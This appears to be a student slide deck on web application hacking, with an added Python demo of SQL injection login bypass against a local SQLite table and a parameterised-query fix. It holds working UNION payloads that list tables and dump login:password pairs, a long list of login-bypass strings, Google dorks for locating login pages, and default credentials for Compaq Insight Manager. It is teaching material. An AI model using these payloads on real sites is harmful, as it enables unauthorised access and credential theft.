
Are You Secure?

Team:
- Septema Umna Maulida (1312530247)
- Ronny Tanjung
- Wirawan Satyadi (1311530230)
- Muhammad Fahmi (1312530148)
- Fajar Agung Rizki (1311530404)
- Bayu Laksono
- Mai Gani Tamim
- Rian Nurjaman
- Husein Allmasyhur
- Rudi Fredrick
Student IDs not attached to a name on the slide: 1311530263, 1311530396, 1311530107, 1311530123, 1311530214, 0911530335

Web Application Hacking

Typical Web Application set-up

[Diagram] Web Client --HTTP request (cleartext or SSL)--> Firewall --> Web Server --> Web apps --> SQL Database
- The Web Client sends the HTTP request (cleartext or SSL); the Web Server returns the HTTP reply (HTML, JavaScript, VBScript, etc.)
- Web Server: Apache, IIS, Netscape, etc.
- Plugins: Perl, C/C++, JSP, etc.
- Database connection: ADO, ODBC, etc.

Utility of Firewalls

[Diagram] Hacks on OS network services are prevented by firewalls: the firewall blocks (X) direct access from the outside to wu-ftpd, Sun RPC and NT ipc$ on the Web Server, while the Web apps and DBs sit behind it.

Firewalls cannot prevent

[Diagram series] The firewall must still pass the Web Client's HTTP traffic to the Web Server, so attacks carried inside ordinary requests reach the Web apps and the DBs behind it:
- URL Interpretation attacks: exploit web server misconfiguration.
- Input Validation attacks: exploit poor checking of user inputs.
- SQL Query Poisoning: extend the SQL statements the Web app sends to the DB.
- Reverse-engineering HTTP cookies: HTTP session hijacking and impersonation.

URL Injection

Client Side
URL:
http://localhost/ronie/uas/index.php?status=detail&id=40

Server Side
$ID = $_GET['id'];   // untrusted query-string value, used as-is
$hasil = mysql_query("SELECT * FROM news WHERE ID = $ID order by id desc");   // $ID is concatenated straight into the SQL

EXAMPLE URL INJECTION QUERIES
MySQL only treats -- as a comment when it is followed by whitespace, so each payload ends in "-- " (trailing space).
Syntax: union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- 
To list the table names in the current database
Syntax: union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- 
To list the column names of every table in the database (add "and table_name='userweb'" to restrict it to one table)
Syntax: union select all 1,group_concat(IDLogin,0x3a,Pass),3,4,5,6 from userweb-- 
To dump the records of the userweb table; 0x3a is the ':' separator placed between login and password

URL Injection

Client Side
URL:
http://localhost/ronie/uas/index.php?status=detail&id=40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--

Server Side
SELECT * FROM news WHERE ID = 40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- order by id desc

The -- is followed by a space before "order by id desc", so MySQL comments out the ORDER BY and runs only the UNION. The injected SELECT must return the same number of columns as SELECT * FROM news (six here), and table_name sits in column 2 because that is the column index.php renders on the page; the other positions are filler constants.

SQL Injection

Web Login Page

[Diagram] Normal login flow through the MySQL application:
- Web Login Page: Username: Bob, Password: MyPass123
- Internet -> APACHE Server running login_script2.php, which builds the query from the form fields:
  Select * from User_Table where user=%user and pass=%pass
- MySQL library -> MySQL Server executes:
  Select * from User_Table where user=Bob and pass=MyPass123

Web Login Page

MySQL Injection

[Diagram] Injected login flow:
- Web Login Page: Username: or 1=1--, Password: (empty)
- Internet -> APACHE Server running login_script2.php, same template:
  Select * from User_Table where user=%user and pass=%pass
- MySQL library -> MySQL Server executes:
  Select * from User_Table where user= or 1=1-- and pass=
Everything after -- is a comment, so the password check is never evaluated, 1=1 makes the WHERE clause true for every row, and the script treats the first row returned as the logged-in user.

Note: the slide omits the quotes around the substituted values; taken literally, user= or 1=1 is a syntax error rather than a bypass. With the usual template user='%user' and pass='%pass' the payload is ' or 1=1-- (the form used in the payload list later in this deck), and MySQL only opens a comment on -- when whitespace follows it, so the payload needs a trailing space (or # in place of --).

Login box

A common query:
SELECT * from table WHERE id=$id
We can inject a malicious query by supplying it as the parameter value:
http://www.host.com/file?id="malicious_code"

Play with SQL Injection:

Google search queries that locate login pages to test:
inurl:login.php
index of:/admin/login.php
index of login.php

Injected query variations:

Which variant works depends on how the application quotes the value: single quotes, double quotes, or a quoted value inside parentheses. Variants ending in -- or # comment out the rest of the statement (-- needs a trailing space in MySQL; # is MySQL-only); variants ending in 'a'='a re-balance the quotes instead and belong in the last field of the WHERE clause (usually the password), otherwise the AND that follows them still has to be satisfied.

Single-quoted context:
admin'--
' or 'x'='x
' or 0=0 --
' or 1=1--
' or 0=0 #
' or a=a--
hi' or 1=1 --
hi' or 'a'='a

Double-quoted context:
" or "a"="a
" or "x"="x
" or 0=0 --
" or 1=1--
" or 0=0 #
hi" or "a"="a
hi" or 1=1 --

Parenthesised context:
hi') or ('a'='a
') or ('a'='a
') or ('x'='x
hi") or ("a"="a
") or ("a"="a

Unquoted (numeric) context:
or 0=0 --
or 1=1--
or 0=0 #
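The login bypass and the payload list above, as an added example that is not part of the deck: the `User_Table` rows and the two query templates are constructed here, SQLite stands in for MySQL, and the comment payloads carry a trailing space after `--` because MySQL only opens a comment on `--` followed by whitespace. The `"`-quoted and `#` variants are left out because SQLite treats `"` as an identifier quote and has no `#` comments; the rest are tried in both the username and the password field so the effect of the quoting context is visible. The unquoted template the slide draws is included to show that it errors rather than logs anyone in.

```python
import sqlite3

# Constructed user table (not from the deck); Bob's row matches the slide.
def setup_users():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE User_Table (user TEXT, pass TEXT);
        INSERT INTO User_Table VALUES ('admin', 'Adm1nP@ss'), ('Bob', 'MyPass123');
    """)
    return conn


# Two ways login_script2.php might quote the form fields (assumed; the slide
# shows neither). {u} and {p} are filled by plain string substitution.
TEMPLATES = {
    "single-quoted": "SELECT user FROM User_Table WHERE user='{u}' AND pass='{p}'",
    "parenthesised": "SELECT user FROM User_Table WHERE user=('{u}') AND pass=('{p}')",
}

# Deck payloads that SQLite can parse. MySQL only opens a comment on "-- "
# followed by whitespace, so the comment variants keep their trailing space.
PAYLOADS = [
    "admin'-- ",
    "' or 1=1-- ",
    "' or 'x'='x",
    "') or ('a'='a",
    "hi') or ('a'='a",
    "or 1=1-- ",
]


def run_login(conn, template, user, pw):
    """Return the username the app would consider logged in, None when no row
    matched, or the SQL error text when the injected query did not parse."""
    query = template.format(u=user, p=pw)
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError as err:
        return f"ERROR: {err}"
    return row[0] if row else None


def bypass_fields(conn, template, payload, other="x"):
    """Try the payload in the username field, then in the password field, and
    report which of the two logs somebody in."""
    hits = []
    for field, (u, p) in (("username", (payload, other)), ("password", (other, payload))):
        result = run_login(conn, template, u, p)
        if result is not None and not result.startswith("ERROR"):
            hits.append(field)
    return hits


def slide_form_is_syntax_error(conn, user="or 1=1-- ", pw=""):
    """The slide's unquoted template, user=%user: feeding it 'or 1=1--' yields
    'user=or 1=1-- and pass=', which does not parse; even plain 'Bob' would be
    read as a column name. The quoting context matters as much as the payload."""
    query = f"SELECT user FROM User_Table WHERE user={user} AND pass={pw}"
    try:
        conn.execute(query)
        return False
    except sqlite3.OperationalError:
        return True


def login_safe(conn, user, pw):
    """Fixed version: bound parameters, so quotes in the input are just data."""
    row = conn.execute(
        "SELECT user FROM User_Table WHERE user=? AND pass=?", (user, pw)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_users()
    for name, template in TEMPLATES.items():
        for payload in PAYLOADS:
            print(f"{name:14} {payload!r:20} -> {bypass_fields(db, template, payload)}")
    print("slide form errors:", slide_form_is_syntax_error(db))
    print("safe:", login_safe(db, "' or 1=1-- ", "x"), login_safe(db, "Bob", "MyPass123"))
```

Running the matrix shows why the list has so many near-duplicates: `' or 1=1-- ` works in either field of the single-quoted form but breaks the parenthesised one, `' or 'x'='x` only works in the password field because `AND` binds tighter than `OR`, and `') or ('a'='a` is the same trick with the parenthesis balanced.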

Directory Browsing

Application Default

Default files, interfaces and credentials that ship with products and are often left in place:
Printer Buffer Overflow (IIS 5.0 .printer ISAPI extension)
http://www.zzzz.com/null.printer
FrontPage Server Extensions Buffer Overflow
http://www.zzzz.com/_vti_bin/_vti_aut/fp30reg.dll
Compaq Insight Manager (CIM), default credentials (username:password)
http://www.zzzz.com:2301
administrator:administrator
administrator:[Null]
operator:operator
Statistics pages
/usage, /stat, /webstat, /wwwstats

Search Queries

THE END
